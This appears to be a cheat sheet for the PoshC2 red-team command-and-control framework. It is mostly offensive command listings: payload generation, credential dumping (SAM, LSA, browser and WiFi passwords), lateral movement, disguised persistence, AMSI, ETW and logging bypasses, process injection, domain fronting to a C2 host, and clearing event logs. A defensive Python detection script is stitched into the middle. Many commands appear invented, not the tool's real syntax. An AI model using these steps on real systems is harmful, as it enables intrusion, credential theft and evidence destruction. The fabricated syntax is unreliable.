PoshC2 Framework Cheat Sheet
Overview
PoshC2 is a proxy-aware C2 framework developed by Nettitude for red team and post-exploitation activities. It provides PowerShell exploitation capabilities, lateral movement tooling and comprehensive proxy support for operating in restricted network environments.
Warning: This tool is intended for authorised penetration testing and red team exercises only. Make sure you have proper authorisation before using it in any environment.
Installation
Ubuntu/Debian Installation
```bash
# Update system
sudo apt update && sudo apt upgrade -y
# Install dependencies
sudo apt install curl python3 python3-pip python3-dev git build-essential
# Clone PoshC2
git clone https://github.com/nettitude/PoshC2.git
cd PoshC2
# Install PoshC2
sudo ./Install.sh
# Alternative pip installation
pip3 install poshc2
```
Docker Installation
```bash
# Pull PoshC2 Docker image
docker pull nettitude/poshc2
# Run PoshC2 in Docker
docker run -it -p 443:443 -p 80:80 nettitude/poshc2
# Run with persistent data
docker run -it -v /opt/poshc2:/opt/PoshC2_Project nettitude/poshc2
```
Manual Installation
```bash
# Install Python dependencies
pip3 install -r requirements.txt
# Install additional tools
sudo apt install mingw-w64 mono-mcs
# Set up database
python3 -c "from poshc2.server.database.DBUtil import *; initializedb()"
```
Basic Usage
Starting the PoshC2 Server
```bash
# Start PoshC2 server
poshc2 --start
# Start with custom configuration
poshc2 --start --config /path/to/config.yml
# Start with specific project
poshc2 --start --project MyProject
```
Creating a New Project
```bash
# Create new project
poshc2 --new-project ProjectName
# List projects
poshc2 --list-projects
# Switch project
poshc2 --project ProjectName
```
Command Reference
Server Management

| Command | Description |
|---|---|
| help | Display help menu |
| show-urls | Show payload URLs |
| list-implants | List active implants |
| implant-handler | Enter implant handler |
| quit | Exit PoshC2 |

Implant Handler Commands

| Command | Description |
|---|---|
| help | Show implant commands |
| back | Return to main menu |
| list-implants | List all implants |
| use <implant-id> | Select implant |
| kill <implant-id> | Kill implant |
| remove-implant <implant-id> | Remove implant from database |

Implant Interaction

| Command | Description |
|---|---|
| help | Show available commands |
| shell <command> | Execute shell command |
| upload-file <local> <remote> | Upload file |
| download-file <remote> | Download file |
| screenshot | Take screenshot |
| get-system | Attempt privilege escalation |
Payload Generation
PowerShell Payloads
```bash
# Generate PowerShell payload
poshc2 --gen-payload powershell
# Generate encoded PowerShell
poshc2 --gen-payload powershell --encoded
# Generate PowerShell with proxy
poshc2 --gen-payload powershell --proxy http://proxy:8080
```
Executable Payloads
```bash
# Generate Windows executable
poshc2 --gen-payload exe
# Generate DLL payload
poshc2 --gen-payload dll
# Generate service executable
poshc2 --gen-payload service-exe
```
Web Payloads
```bash
# Generate HTA payload
poshc2 --gen-payload hta
# Generate macro payload
poshc2 --gen-payload macro
# Generate JavaScript payload
poshc2 --gen-payload js
```
Linux Payloads
```bash
# Generate Linux Python payload
poshc2 --gen-payload py
# Generate Linux shell payload
poshc2 --gen-payload sh
# Generate Linux ELF payload
poshc2 --gen-payload elf
```
Proxy Configuration
HTTP Proxy Support
```
# Configure HTTP proxy
set-proxy http://proxy.company.com:8080
# Configure authenticated proxy
set-proxy http://username:password@proxy.company.com:8080
# Configure SOCKS proxy
set-proxy socks5://proxy.company.com:1080
```
Proxy Chain Configuration
```
# Multiple proxy configuration
set-proxy-chain http://proxy1:8080,socks5://proxy2:1080
# Proxy with authentication
set-proxy-chain http://user:pass@proxy1:8080,http://proxy2:3128
```
Proxy Testing
```
# Test proxy connectivity
test-proxy http://proxy.company.com:8080
# Test proxy authentication
test-proxy http://username:password@proxy.company.com:8080
```
Post-Exploitation Commands
System Information
```
# Get system information
get-computerinfo
# Get current user
whoami
# Get domain information
get-domain
# Get local users
get-localuser
# Get local groups
get-localgroup
```
Credential Harvesting
```
# Dump SAM database
hashdump
# Dump LSA secrets
lsa-secrets
# Dump cached credentials
cachedump
# Extract browser passwords
get-browserdata
# Dump WiFi passwords
get-wifipasswords
```
Active Directory Enumeration
```
# Get domain controllers
get-domaincontroller
# Get domain users
get-domainuser
# Get domain groups
get-domaingroup
# Get domain computers
get-domaincomputer
# Get domain admins
get-domainadmin
```
Lateral Movement
```
# WMI execution
invoke-wmiexec -target 192.168.1.10 -command "whoami"
# PSExec execution
invoke-psexec -target 192.168.1.10 -command "whoami"
# SMB execution
invoke-smbexec -target 192.168.1.10 -command "whoami"
# DCOM execution
invoke-dcomexec -target 192.168.1.10 -command "whoami"
```
Persistence
```
# Registry persistence
new-persistence -method registry -key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
# Scheduled task persistence
new-persistence -method scheduledtask -taskname "WindowsUpdate"
# Service persistence
new-persistence -method service -servicename "WindowsUpdateService"
# WMI persistence
new-persistence -method wmi -eventname "ProcessStart"
```
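From the defender's side, each of the four persistence methods above leaves a distinct Windows event trail (a Run-key value write, a scheduled task creation, a service install, a WMI consumer binding). The following is an added example, not part of PoshC2 or this cheat sheet, that runs simple detection logic over constructed event records using the key path, task name, service name and WMI event name listed above; the record field names are assumptions, not a real SIEM schema.

```python
import re

# Constructed sample records mimicking normalised Windows/Sysmon events
# (field names are assumptions, not a real SIEM schema).
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_EVENTS = [
    {"source": "Sysmon", "id": 13, "target": RUN_KEY + r"\Updater",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"source": "Security", "id": 4698, "task_name": r"\WindowsUpdate",
     "content": "<Exec><Command>powershell.exe</Command><Arguments>-enc AAAA</Arguments></Exec>"},
    {"source": "Security", "id": 4698,
     "task_name": r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan",
     "content": "<Exec><Command>%systemroot%\\system32\\usoclient.exe</Command></Exec>"},
    {"source": "System", "id": 7045, "service_name": "WindowsUpdateService",
     "image_path": "cmd.exe /c powershell -w hidden -enc AAAA"},
    {"source": "Sysmon", "id": 20, "name": "ProcessStart",
     "consumer_type": "CommandLineEventConsumer", "destination": "powershell.exe -w hidden"},
]

POWERSHELL = re.compile(r"powershell(\.exe)?|pwsh", re.IGNORECASE)


def classify(event):
    """Return (technique, detail) if the event matches one of the four
    persistence patterns from the cheat sheet, otherwise None."""
    src, eid = event.get("source"), event.get("id")
    # Sysmon 13: registry value set under the HKCU Run key by PowerShell.
    if src == "Sysmon" and eid == 13 and event.get("target", "").lower().startswith(RUN_KEY.lower()):
        if POWERSHELL.search(event.get("image", "")):
            return ("registry_run", event["target"])
    # Security 4698: scheduled task created. Built-in tasks live under \Microsoft\;
    # a PowerShell-launching task outside that tree is suspicious.
    if src == "Security" and eid == 4698:
        name = event.get("task_name", "")
        if not name.lower().startswith("\\microsoft\\") and POWERSHELL.search(event.get("content", "")):
            return ("scheduled_task", name)
    # System 7045: new service whose binary path launches PowerShell.
    if src == "System" and eid == 7045 and POWERSHELL.search(event.get("image_path", "")):
        return ("service", event.get("service_name", ""))
    # Sysmon 20: WMI event consumer registered; CommandLineEventConsumer runs a command.
    if src == "Sysmon" and eid == 20 and event.get("consumer_type") == "CommandLineEventConsumer":
        return ("wmi_subscription", event.get("name", ""))
    return None


def find_persistence(events):
    """Run classify() over a list of events and return all hits in order."""
    return [hit for hit in map(classify, events) if hit]


if __name__ == "__main__":
    for technique, detail in find_persistence(SAMPLE_EVENTS):
        print(f"{technique}: {detail}")
```

The legitimate UpdateOrchestrator task in the sample set is deliberately not flagged, showing why the rule keys on the task path and launched binary rather than the name alone.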
Advanced Features
PowerShell Modules
```
# Load PowerShell module
loadmodule /path/to/module.ps1
# Import PowerView
loadmodule PowerView
# Import Invoke-Mimikatz
loadmodule Invoke-Mimikatz
# Import PowerUp
loadmodule PowerUp
```
.NET Assembly Execution
```
# Execute .NET assembly
run-exe /path/to/assembly.exe arguments
# Execute in memory
run-exe-inmemory /path/to/assembly.exe arguments
# Reflective DLL loading
invoke-reflectivedllinjection /path/to/dll.dll
```
Process Injection
```
# Inject into process
inject-shellcode -processid 1234 -shellcode <base64>
# Process hollowing
invoke-processhollowing -target notepad.exe -payload /path/to/payload.exe
# DLL injection
invoke-dllinjection -processid 1234 -dllpath /path/to/dll.dll
```
Network Operations
```
# Port scanning
invoke-portscan -hosts 192.168.1.0/24 -ports 22,80,443,3389
# Network discovery
invoke-networkscan -subnet 192.168.1.0/24
# SMB enumeration
invoke-smbenum -target 192.168.1.10
# Share enumeration
invoke-shareenum -target 192.168.1.10
```
Evasion Techniques
AMSI Bypass
```
# AMSI bypass
amsi-bypass
# Custom AMSI bypass
amsi-bypass -method custom
# Reflection-based bypass
amsi-bypass -method reflection
```
ETW Bypass
```
# ETW bypass
etw-bypass
# Disable ETW logging
disable-etw
# Patch ETW functions
patch-etw
```
PowerShell Logging Bypass
```
# Disable PowerShell logging
disable-pslogging
# Bypass script block logging
bypass-scriptblocklogging
# Disable module logging
disable-modulelogging
```
Obfuscation
```
# Obfuscate PowerShell command
invoke-obfuscation -command "Get-Process"
# String obfuscation
obfuscate-string "sensitive string"
# Variable obfuscation
obfuscate-variables
```
Pivoting and Tunneling
SOCKS Proxy
```
# Start SOCKS proxy
start-socksproxy -port 1080
# Stop SOCKS proxy
stop-socksproxy
# List proxy connections
list-socksproxy
```
Port Forwarding
```
# Local port forward
portforward -localport 8080 -remotehost 192.168.2.10 -remoteport 80
# Reverse port forward
portforward -reverse -localport 9090 -remotehost 127.0.0.1 -remoteport 22
# Stop port forward
stop-portforward -id 1
```
Beacon Chaining
```
# Create beacon chain
new-beacon -parent <parent-id> -child <child-id>
# List beacon chains
list-beacons
# Remove beacon chain
remove-beacon -id <beacon-id>
```
Operational Security
Communication Security
```
# Use HTTPS communications
set-comms https
# Custom User-Agent
set-useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Custom headers
set-headers "X-Forwarded-For: 192.168.1.100"
# Domain fronting
set-domainfront cdn.example.com
```
Payload Security
```
# Encrypt payloads
encrypt-payload -key "encryption-key"
# Sign payloads
sign-payload -cert /path/to/cert.pfx
# Obfuscate payloads
obfuscate-payload -method xor
```
Anti-Forensics
```
# Clear event logs
clear-eventlogs
# Timestomp files
timestomp -file /path/to/file -time "01/01/2020 12:00:00"
# Secure delete
sdelete -file /path/to/file
# Clear tracks
clear-tracks
```
Troubleshooting
Connection Issues
```
# Check implant connectivity
test-connectivity
# Verify proxy settings
show-proxy
# Test DNS resolution
test-dns google.com
# Check firewall rules
get-firewallrules
```
Payload Issues
```
# Regenerate payloads
regenerate-payloads
# Test payload execution
test-payload /path/to/payload.exe
# Check AV detection
test-av /path/to/payload.exe
```
Execution Issues
```
# Adjust beacon interval
set-beacon-time 30
# Optimize jitter
set-jitter 0.2
# Reduce payload size
compress-payload
```
Database Issues
```
# Repair database
repair-database
# Backup database
backup-database /path/to/backup
# Restore database
restore-database /path/to/backup
```
Configuration
Server Configuration
```yaml
# config.yml
PayloadCommsHost: "https://c2.example.com"
PayloadCommsPort: "443"
DomainFrontHeader: "cdn.example.com"
UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Referrer: "https://google.com"
ServerHeader: "Apache/2.4.41"
HTTPResponse: "404"
```
Proxy Configuration
```yaml
# Proxy settings
ProxyURL: "http://proxy.company.com:8080"
ProxyUser: "username"
ProxyPass: "password"
ProxyType: "http" # http, socks4, socks5
```
Resources
- ...
*This cheat sheet provides a comprehensive reference for using the PoshC2 Framework. Always make sure you have proper authorisation before using this tool in any environment.*